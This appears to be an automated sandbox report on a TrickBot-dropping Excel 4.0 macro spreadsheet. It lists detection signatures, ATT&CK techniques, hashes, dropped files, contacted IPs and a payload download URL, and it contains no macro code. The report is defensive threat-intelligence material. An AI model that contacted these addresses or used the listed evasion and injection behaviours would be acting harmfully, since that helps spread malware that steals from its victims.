Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665 (renamed file extension from 29665 to xls) |
Analysis ID: | 355601 |
MD5: | a7466c0502a35e0bb2e2d4dd939a57c2 |
SHA1: | 3d17487de5287ddb252e768753487c17204358db |
SHA256: | 7223ea0365af06d9e25b51636aec301aa8ab84682427b6a0eacfbfb20befccda |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 TrickBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Code function: |
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) | Show sources |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements | Show sources |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Security Software Discovery12 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | System Network Configuration Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | System Information Discovery113 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Virustotal | Browse | ||
24% | ReversingLabs | Document-Word.Downloader.EncDoc |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
5% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
chipmania.it | 185.81.0.78 | true | false |
| unknown |
www.chipmania.it | unknown | unknown | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
108.170.20.75 | unknown | United States | 20454 | SSASN2US | true | |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
185.163.45.138 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | true | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355601 |
Start date: | 20.02.2021 |
Start time: | 02:12:46 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665 (renamed file extension from 29665 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/7@1/4 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:13:41 | API Interceptor | |
02:13:41 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
108.170.20.75 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
185.81.0.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RedesyTelecomunicacionesHN | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SSASN2US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SERVERPLAN-ASIT | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
MIVOCLOUDMD | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660506462967762 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXt:YEGSzx0dmxk7RbsYsKtseoXd |
MD5: | 9C33B6088AC530FC55B5C91C5BF56B24 |
SHA1: | B2B3832E3F1C394090D77A78C619BD931D27BBD4 |
SHA-256: | 5DAB9606C84F490C38FC34D53BB6667A69700A2909DC9E4A8F27446D163B2186 |
SHA-512: | 2F2B0B0194DBBA468F44688552268DC9E71194C49EA529436743F5B701226D2073D642A1C269E5859C03E526D9C8A361FCB0A8A4E44D1A3A4523FB9D62CC03EB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48260877454188 |
Encrypted: | false |
SSDEEP: | 12:85QkrwbLgXg/XAlCPCHaXgzB8IB/W9bXX+WnicvbRbDtZ3YilMMEpxRljK5TdJP8:85A/XTwz6IMXYeBDv3qYrNru/ |
MD5: | 480CFEC8F8DDD2143C63FCE36EAB4884 |
SHA1: | 35462E5DB9987DDCD2455E235CF1AAB71E606D3E |
SHA-256: | 167284DFF18BBF782FB08B875ED3B58D3CECD623EBCE3D09578182E0E7D064A8 |
SHA-512: | 74D725057DAD84C8A73E7F1D13E4014276282E1AEDCACC88733C238DE487423A7CAE86F5A8D3627AC5549921B7DDA70B58CF68D978E20BE667FD279B8184F35D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.586134719124884 |
Encrypted: | false |
SSDEEP: | 48:8z/XT3I4HCo6z3HCsYQh2z/XT3I4HCo6z3HCsYQ/:8z/XLI4i9SsYQh2z/XLI4i9SsYQ/ |
MD5: | 71449C753C4394E2CE8EC56396C9D374 |
SHA1: | 6500F65366143261861A8BD53014BC4097DE9D36 |
SHA-256: | 454AFE73F1A3CCFCED61883249958A02C76CEBAA5E88B02492536EA5CC9C7F0C |
SHA-512: | 9487DEDA77FC7519A7B0003BE14D45538E1D0CC8A6F254A243312249E065B66274E75F5FD0C266616C1326C011B1282B74BD64B532EC03B371AECEF42E36B8B8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.821642993109982 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMW4pUYCuscbcsoMW4pUYCmM0bcsoMW4pUYCv:dj60wsoMW4pB7wsoMW4pBU0wsoMW4pBs |
MD5: | 9628A5AE06F9F114CD0F0936574FC298 |
SHA1: | DC6E51926B6C3A0E430A6445829BAF71A40BA70E |
SHA-256: | FF2B7A112579AA7355A6FED4232A96EDFE20D476990345439F9018F82610C579 |
SHA-512: | 1AF06F35C0DC980EFC3782CE5BB291ED514DEE47575BFB928634D0A7298A34827A90F127586B10FC5E12D0D2C458640B158985C797D14F89F9617BF5C6A804DD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.239935410150908 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnK:4cKoSsxzNDZLDZjlbR868O8KL5L+4iK+ |
MD5: | 83B5D499E61F3F8F3E1708ABF03B6CB7 |
SHA1: | 9C292FA6A43FD590DDF439F4F428373DC35140AD |
SHA-256: | 2BF840715B397082E7D4C54245150284AFCC51454505EE611443EA442CA16DBD |
SHA-512: | 0647AE5F663F31EB162F7ECBE1AC8D8E127240E314D316C79C12CE936DE5793B90DF1C857866AF26B9D6EC79FFFC37853A1D40CEA3E6F87C6BBA07A6FF173B4D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195172018000313 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls |
File size: | 168960 |
MD5: | a7466c0502a35e0bb2e2d4dd939a57c2 |
SHA1: | 3d17487de5287ddb252e768753487c17204358db |
SHA256: | 7223ea0365af06d9e25b51636aec301aa8ab84682427b6a0eacfbfb20befccda |
